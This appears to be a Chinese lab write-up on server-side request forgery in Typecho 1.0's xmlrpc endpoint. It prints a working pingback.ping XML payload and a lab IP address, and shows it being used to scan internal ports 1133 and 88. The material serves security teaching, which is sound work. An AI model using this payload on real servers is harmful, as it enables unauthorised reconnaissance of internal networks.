直接訪問(wèn):http://120.203.13.75:8123/ssrf/typecho-1.0-14.10.9-release/index.php/action/xmlrpc
頁(yè)面提示如下:
image.png
提示信息告訴我們,該URL訪問(wèn)的是一個(gè)xmlrpc服務(wù),但該服務(wù)只接受POST請(qǐng)求。
因?yàn)檫@里可以通過(guò)xmlrpc來(lái)對(duì)外發(fā)起網(wǎng)絡(luò)請(qǐng)求,所以這里也存在SSRF漏洞。
關(guān)于xmlrpc請(qǐng)求為什么會(huì)存在SSRF漏洞,下面貼一段搜索到的解釋:
image.png
通過(guò)搜索引擎可以查到xmlrpc的請(qǐng)求包格式,于是構(gòu)造如下xml請(qǐng)求來(lái)探測(cè)內(nèi)網(wǎng)端口是否開放:
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://127.0.0.1:1133</string>
</value>
</param>
<param>
<value>
<string>ladybird</string>
</value>
</param>
</params>
</methodCall>
用BurpSuite改包:
image.png
可以看到服務(wù)器內(nèi)網(wǎng)的1133端口并未開放。
再測(cè)試內(nèi)網(wǎng)的88端口:
image.png
可以看到服務(wù)器內(nèi)網(wǎng)的88端口是開放的。